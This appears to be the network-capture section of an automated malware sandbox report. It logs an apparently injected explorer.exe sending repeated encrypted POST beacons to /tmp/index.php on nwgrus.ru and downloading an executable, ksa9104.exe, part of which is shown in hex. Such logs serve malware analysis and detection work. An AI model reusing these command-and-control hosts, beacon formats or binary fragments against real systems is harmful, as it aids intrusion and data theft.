Sep 30, 2024 15:39:33.966985941 CEST	180	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 2e ee 8f Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vue.b.f^eJmzj2r/98T:8v+(Y;qL>3O
Sep 30, 2024 15:39:34.947253942 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:39:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49752	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:39:35.766473055 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eankyeljcevd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 236 Host: nwgrus.ru
Sep 30, 2024 15:39:35.766506910 CEST	236	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 26 ba f2 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vug&dlMc2HH9ynf!>QxqJ\(+!.:kMjE^/2_'dFH6w=0^0Ms}hB7kbm
Sep 30, 2024 15:39:36.911855936 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:39:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	49753	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:39:39.439867973 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://luejdvwxxrcvrqdh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 221 Host: nwgrus.ru
Sep 30, 2024 15:39:39.440026045 CEST	221	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 75 17 d1 b9 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vuuLlYsgv;`(QvD*nQT7t28`M_=a5`EKzunBiWE%G2H
Sep 30, 2024 15:39:40.478954077 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:39:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	49754	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:39:46.696904898 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://svfopofgftavf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 294 Host: nwgrus.ru
Sep 30, 2024 15:39:46.696937084 CEST	294	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 21 a4 fc Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vuM!R>ENh\fVx?NM0suQe,9BUB4D]UU[!YG6~4e6r;jFHW:gNk%XvFv@
Sep 30, 2024 15:39:47.649435043 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:39:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	49755	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:39:56.152930975 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bprjpwpsmmrgaa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: nwgrus.ru
Sep 30, 2024 15:39:56.152930975 CEST	313	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 74 3b e5 e4 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vut;x`RkFiL#A t7v[_-9/Tv'Zg2Rg2nL!5yM@q^wWdyyQi6v
Sep 30, 2024 15:39:57.130166054 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:39:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	49756	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:40:08.768022060 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ocnxfkuqumobjmad.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 111 Host: nwgrus.ru
Sep 30, 2024 15:40:08.768075943 CEST	111	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 33 fa a7 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vuN3nudkHUm]
Sep 30, 2024 15:40:09.910373926 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:40:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	49758	109.121.204.14	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:40:23.506861925 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dxdhacbibrdlwrt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 291 Host: nwgrus.ru
Sep 30, 2024 15:40:23.508078098 CEST	291	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 5c f8 87 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vuU\likO6InHV8er{,W)_Q,GwBZ;GveYEfyTbOJRqQS~4~nFxn8r7>F4"
Sep 30, 2024 15:40:24.269634962 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:40:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	49760	109.121.204.14	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:40:45.417623043 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nlmsxhroxptelhd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 123 Host: nwgrus.ru
Sep 30, 2024 15:40:45.417640924 CEST	123	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 20 bd aa Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vu) HcfNC?>c[Fi
Sep 30, 2024 15:40:46.200867891 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:40:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	49762	109.121.204.14	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:41:08.384318113 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hikneccvvrshgb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 349 Host: nwgrus.ru
Sep 30, 2024 15:41:08.384341002 CEST	349	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 56 fc e3 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vueVUD~,'(}?lblV,=6xfCQu'otl6oA\Rc\^Q9U+Q2gt]!ou}m-
Sep 30, 2024 15:41:09.207103014 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:41:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49726	23.145.40.164	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:13 UTC	162	OUT	GET /ksa9104.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 23.145.40.164
2024-09-30 13:38:14 UTC	327	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:38:14 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Last-Modified: Mon, 30 Sep 2024 13:00:02 GMT ETag: "3be00-62355c8712010" Accept-Ranges: bytes Content-Length: 245248 Connection: close Content-Type: application/x-msdos-program
2024-09-30 13:38:14 UTC	7865	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 d2 fc 49 43 b3 92 1a 43 b3 92 1a 43 b3 92 1a 5d e1 16 1a 5f b3 92 1a 5d e1 07 1a 50 b3 92 1a 5d e1 11 1a 1f b3 92 1a 64 75 e9 1a 44 b3 92 1a 43 b3 93 1a 32 b3 92 1a 5d e1 18 1a 42 b3 92 1a 5d e1 06 1a 42 b3 92 1a 5d e1 03 1a 42 b3 92 1a 52 69 63 68 43 b3 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 eb 99 1f 65 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ICCC]_]P]duDC2]B]B]BRichCPELe
2024-09-30 13:38:15 UTC	8000	IN	Data Raw: 04 85 c0 75 24 a1 f0 90 41 00 a3 d0 db 41 00 a1 fc 90 41 00 c7 05 cc db 41 00 17 27 40 00 89 35 d4 db 41 00 a3 d8 db 41 00 ff 15 f4 90 41 00 a3 ac c2 41 00 83 f8 ff 0f 84 cc 00 00 00 ff 35 d0 db 41 00 50 ff d6 85 c0 0f 84 bb 00 00 00 e8 27 05 00 00 ff 35 cc db 41 00 e8 13 fb ff ff ff 35 d0 db 41 00 a3 cc db 41 00 e8 03 fb ff ff ff 35 d4 db 41 00 a3 d0 db 41 00 e8 f3 fa ff ff ff 35 d8 db 41 00 a3 d4 db 41 00 e8 e3 fa ff ff 83 c4 10 a3 d8 db 41 00 e8 5d eb ff ff 85 c0 74 65 68 0b 29 40 00 ff 35 cc db 41 00 e8 3d fb ff ff 59 ff d0 a3 a8 c2 41 00 83 f8 ff 74 48 68 14 02 00 00 6a 01 e8 8b 00 00 00 8b f0 59 59 85 f6 74 34 56 ff 35 a8 c2 41 00 ff 35 d4 db 41 00 e8 0a fb ff ff 59 ff d0 85 c0 74 1b 6a 00 56 e8 e7 fb ff ff 59 59 ff 15 08 91 41 00 83 4e 04 ff 89 06 Data Ascii: u$AAAA'@5AAAA5AP'5A5AA5AA5AAA]teh)@5A=YAtHhjYYt4V5A5AYtjVYYAN
2024-09-30 13:38:15 UTC	8000	IN	Data Raw: 56 5c a1 9c c9 41 00 57 8b 7d 08 8b ca 53 39 39 74 0e 8b d8 6b db 0c 83 c1 0c 03 da 3b cb 72 ee 6b c0 0c 03 c2 3b c8 73 08 39 39 75 04 8b c1 eb 02 33 c0 85 c0 74 0a 8b 58 08 89 5d fc 85 db 75 07 33 c0 e9 fb 00 00 00 83 fb 05 75 0c 83 60 08 00 33 c0 40 e9 ea 00 00 00 83 fb 01 0f 84 de 00 00 00 8b 4e 60 89 4d f8 8b 4d 0c 89 4e 60 8b 48 04 83 f9 08 0f 85 b8 00 00 00 8b 0d 90 c9 41 00 8b 3d 94 c9 41 00 8b d1 03 f9 3b d7 7d 24 6b c9 0c 8b 7e 5c 83 64 39 08 00 8b 3d 90 c9 41 00 8b 1d 94 c9 41 00 42 03 df 83 c1 0c 3b d3 7c e2 8b 5d fc 8b 00 8b 7e 64 3d 8e 00 00 c0 75 09 c7 46 64 83 00 00 00 eb 5e 3d 90 00 00 c0 75 09 c7 46 64 81 00 00 00 eb 4e 3d 91 00 00 c0 75 09 c7 46 64 84 00 00 00 eb 3e 3d 93 00 00 c0 75 09 c7 46 64 85 00 00 00 eb 2e 3d 8d 00 00 c0 75 09 c7 Data Ascii: V\AW}S99tk;rk;s99u3tX]u3u`3@N`MMN`HA=A;}$k~\d9=AAB;\|]~d=uFd^=uFdN=uFd>=uFd.=u
2024-09-30 13:38:15 UTC	8000	IN	Data Raw: f3 74 07 8b 7d 0c 3b fb 77 1b e8 26 ad ff ff 6a 16 5e 89 30 53 53 53 53 53 e8 b3 d6 ff ff 83 c4 14 8b c6 eb d5 39 5d 14 75 04 88 1e eb ca 8b 55 10 3b d3 75 04 88 1e eb d1 83 7d 14 ff 8b c6 75 0f 8a 0a 88 08 40 42 3a cb 74 1e 4f 75 f3 eb 19 8a 0a 88 08 40 42 3a cb 74 08 4f 74 05 ff 4d 14 75 ee 39 5d 14 75 02 88 18 3b fb 75 8b 83 7d 14 ff 75 0f 8b 45 0c 6a 50 88 5c 06 ff 58 e9 78 ff ff ff 88 1e e8 ac ac ff ff 6a 22 59 89 08 8b f1 eb 82 8b ff 55 8b ec 8b 4d 08 53 33 db 56 57 3b cb 74 07 8b 7d 0c 3b fb 77 1b e8 86 ac ff ff 6a 16 5e 89 30 53 53 53 53 53 e8 13 d6 ff ff 83 c4 14 8b c6 eb 30 8b 75 10 3b f3 75 04 88 19 eb da 8b d1 8a 06 88 02 42 46 3a c3 74 03 4f 75 f3 3b fb 75 10 88 19 e8 4b ac ff ff 6a 22 59 89 08 8b f1 eb c1 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc Data Ascii: t};w&j^0SSSSS9]uU;u}u@B:tOu@B:tOtMu9]u;u}uEjP\Xxj"YUMS3VW;t};wj^0SSSSS0u;uBF:tOu;uKj"Y3_^[]
2024-09-30 13:38:15 UTC	8000	IN	Data Raw: 89 01 41 41 46 46 66 3b c7 74 03 4b 75 ee 33 c0 3b df 75 d3 66 89 02 e8 d9 8d ff ff 6a 22 59 89 08 8b f1 eb b3 8b ff 55 8b ec 8b 45 08 66 8b 08 40 40 66 85 c9 75 f6 2b 45 08 d1 f8 48 5d c3 55 8b ec 83 ec 08 89 7d fc 89 75 f8 8b 75 0c 8b 7d 08 8b 4d 10 c1 e9 07 eb 06 8d 9b 00 00 00 00 66 0f 6f 06 66 0f 6f 4e 10 66 0f 6f 56 20 66 0f 6f 5e 30 66 0f 7f 07 66 0f 7f 4f 10 66 0f 7f 57 20 66 0f 7f 5f 30 66 0f 6f 66 40 66 0f 6f 6e 50 66 0f 6f 76 60 66 0f 6f 7e 70 66 0f 7f 67 40 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 49 75 a3 8b 75 f8 8b 7d fc 8b e5 5d c3 55 8b ec 83 ec 1c 89 7d f4 89 75 f8 89 5d fc 8b 5d 0c 8b c3 99 8b c8 8b 45 08 33 ca 2b ca 83 e1 0f 33 ca 2b ca 99 8b f8 33 fa 2b fa 83 e7 0f 33 fa 2b fa 8b d1 0b d7 75 4a Data Ascii: AAFFf;tKu3;ufj"YUEf@@fu+EH]U}uu}MfofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpIuu}]U}u]]E3+3+3+3+uJ
2024-09-30 13:38:15 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-09-30 13:38:15 UTC	8000	IN	Data Raw: b2 e5 af 70 b2 7e 99 be b5 52 4f a7 a8 c5 1d b9 36 13 88 8a 19 4c 68 a4 a7 4b 4c ec f8 d8 ea f9 29 b9 7a 3c 33 77 a3 96 64 4f e7 6b d3 06 84 b4 ad c3 76 4b 31 72 a8 44 ca 89 f2 01 aa c4 fa 6e 40 ce 74 57 04 46 15 e5 49 f4 6f ec f3 ea ed 65 af 3a 0d bd a2 cf a3 fa 53 90 6b e6 4c 30 43 23 e2 68 b8 ec 55 fe 27 11 7a f0 28 35 ba 3d 49 ee 48 d7 97 92 b6 75 79 b1 f3 76 8a e4 13 d5 29 bd 63 7c ca 31 26 4e 5f 67 b2 0f 2d cb 87 6c 56 06 a9 6b b8 34 6a 03 78 55 33 0b 79 3e c3 ea e4 26 67 75 c2 41 ca d6 7a d3 4e fa 13 d0 cb 5a 8a 5c c4 59 10 17 05 1e 41 56 48 a2 4c be 9c 79 81 79 b1 81 83 7e 1e 48 e0 2d f2 09 28 26 6e d0 68 70 37 c8 93 58 15 54 b5 18 86 d6 df 95 89 2b 70 5b c7 20 6a 89 82 12 b4 2a 7e ef 91 4e 94 3d cd 43 81 ed 01 5a 45 77 5d 28 d1 dd 17 d2 be 78 31 Data Ascii: p~RO6LhKL)z<3wdOkvK1rDn@tWFIoe:SkL0C#hU'z(5=IHuyv)c\|1&N_g-lVk4jxU3y>&guAzNZ\YAVHLyy~H-(&nhp7XT+p[ j*~N=CZEw](x1
2024-09-30 13:38:15 UTC	8000	IN	Data Raw: 21 b1 f3 8c 26 82 9c e4 c9 85 98 03 b2 64 bf f8 93 92 3e bb 63 75 d5 47 07 21 4a d2 2a 8c df d3 7c f5 c7 cc 8c 95 cd 92 ae cb 27 bd 4b bb 7f 74 98 18 0c 8a a4 21 84 e6 3a 80 82 18 a4 a6 d4 0b d8 61 94 a3 c5 38 bd 6a 22 6b 07 28 6c a1 ff a1 df 70 e5 5c 54 58 28 78 ec 42 d0 0b b4 d1 3f b8 cb fe 90 ba 69 e8 e0 05 9e 5a bf ab ba 7c 08 a5 2e 2b 94 bf 8b 7e b2 b6 60 d2 c3 7e 12 98 4a fb c1 63 5c db ac 86 fc 3f d0 46 04 91 0f 5f 5d 43 eb 0e 4d ca 9b dd 02 13 f8 f6 82 68 20 79 1d 93 6c b0 ce 52 9c f5 46 0e 0a 04 0a c2 4d f3 48 4e 3d 5e 5b 72 65 18 08 80 8f 06 10 a2 21 87 d9 02 f1 ba 35 c7 92 39 54 d0 e3 b3 4f 42 7e ff 26 c2 08 d8 d0 d0 1d eb cc 16 c1 10 05 fc ab 52 e2 24 46 09 30 9f 26 55 3e 41 2c 36 ec 46 bf e7 47 8c 8f 3a 24 62 d6 3b 36 81 6e 03 71 4b 25 f4 8f Data Ascii: !&d>cuG!J*\|'Kt!:a8j"k(lp\TX(xB?iZ\|.+~`~Jc\?F_]CMh ylRFMHN=^[re!59TOB~&R$F0&U>A,6FG:$b;6nqK%
2024-09-30 13:38:15 UTC	8000	IN	Data Raw: a0 87 ee b0 d3 28 ae 71 bd b5 9e 32 b5 67 75 92 a2 bf 93 f2 32 0d 6d f0 b0 91 4c 70 71 bb 25 aa fe a4 1f 58 d8 ba d7 59 82 d9 b2 3a 29 8b e8 b7 52 1d 1f 17 48 0f 96 37 e2 cc 33 78 52 03 67 5f 92 a6 7b cc d2 26 69 2c ce 82 e5 95 5c e2 1f 9a 21 de d3 e9 c9 52 08 40 2d d8 c9 de ed 08 62 5d 62 40 4e ed bc 24 a7 ef 8c e1 d2 b0 11 5b 08 be 98 3b 79 d3 34 75 3f b7 b3 3a 29 13 da 23 d9 30 4d 84 b2 05 17 5b 5c 2a 29 1e 78 c3 fd 6c 42 1f 3c 54 36 8d 0f 77 08 e5 6b 9f 21 dd 26 6c cb 43 d5 ac f5 d8 c0 f5 96 b1 f5 26 f8 a6 ca 2b a0 4e 7c 50 da f8 1b ac 34 61 c6 1a 02 f3 4c 66 3c 17 5b c2 0d d4 88 bd ed d1 db 36 85 1d 55 4d 45 82 dd df a2 fb 12 41 3b 95 e4 ed ba 50 e6 47 fa b0 d4 bf f8 9f b0 5f 45 e4 88 dd 91 0f dd 11 04 1f 49 a5 69 96 27 60 74 64 29 15 12 5e 9f 3b c0 Data Ascii: (q2gu2mLpq%XY:)RH73xRg_{&i,\!R@-b]b@N$[;y4u?:)#0M[\*)xlB<T6wk!&lC&+N\|P4aLf<[6UMEA;PG_EIi'`td)^;
2024-09-30 13:38:15 UTC	8000	IN	Data Raw: da 41 e1 e6 62 2a a6 14 76 9b 14 3b 3d 4f ab 6a 90 80 f4 ab bc d9 d7 47 41 7d 22 49 e5 ac b4 ea 8b db 98 a8 e1 58 40 e1 e3 22 65 88 3d d2 c0 8b 1c fd 59 37 80 a1 53 f8 9b 34 11 16 15 9e 29 56 65 ce 32 3c 8a 8f 5f 0f 85 18 62 dd ec b5 75 ca ad 44 b6 35 ef bd 5b 05 5f fe 4b c7 a1 1f bf 9d ad 5f 6e 80 cc cf 5d aa 8b 16 bb d3 1c 33 9d c1 bb c5 2d 1d 79 99 c6 54 1e 78 2b 89 04 ba 28 68 29 71 63 7f d4 4f 2c a4 97 00 21 cc 22 9f 41 a5 88 2a b7 1c 34 83 e4 9c e0 70 97 de f6 ff 39 7a 48 5e c1 16 9b f8 b2 28 9e ba 26 8e b4 f7 45 5b 39 14 46 8f 97 57 71 2b e3 50 24 95 d7 81 94 f6 61 84 c1 37 d1 b7 35 6a 72 d7 0a 37 03 1d 44 5d 9f 65 42 ed 33 54 10 9d 98 ff 69 f5 08 a8 f7 db e4 11 ab 34 32 15 9d 45 a2 dc 55 53 a0 71 ed 33 15 56 39 f4 d0 b3 3d 19 29 08 23 c8 d7 db a7 Data Ascii: Abv;=OjGA}"IX@"e=Y7S4)Ve2<_buD5[_K_n]3-yTx+(h)qcO,!"A4p9zH^(&E[9FWq+P$a75jr7D]eB3Ti42EUSq3V9=)#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49738	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:44 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://mcjvrcrjrartnd.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 223 Host: calvinandhalls.com
2024-09-30 13:38:44 UTC	223	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 2d c6 06 b3 c1 dd 00 52 ab 00 1e 8e 59 8a eb 2f 6c d9 3f 03 3d d8 eb d4 6e e3 b8 6b 18 cc b6 3b bb 6b 50 96 ff 7b 0e 6b 64 47 25 d8 1a a1 91 86 37 cb fd 76 0b 09 e3 00 12 e7 77 1c 82 c2 89 bc 2e 72 96 5a ba 6d 99 76 5e b9 03 cc 20 38 5f 2e 5b d8 fa 67 bf c2 6f d0 09 6e fc bc bc 4a ad fb 1a f3 b6 9c c1 2e 20 bb bc c1 48 56 b6 6f 29 c2 31 76 28 9c 69 2d 3b db 36 1d 2c 83 cc f6 32 23 d5 fa 0a bf 76 f4 a5 b2 71 28 0d 35 cc 19 37 08 7c Data Ascii: ryid8a(f\|5r2,)%P g3iqH[CLj4%<-RY/l?=nk;kP{kdG%7vw.rZmv^ 8_.[gonJ. HVo)1v(i-;6,2#vq(57\|
2024-09-30 13:38:44 UTC	294	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 13:38:44 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Connection: close Transfer-Encoding: chunked
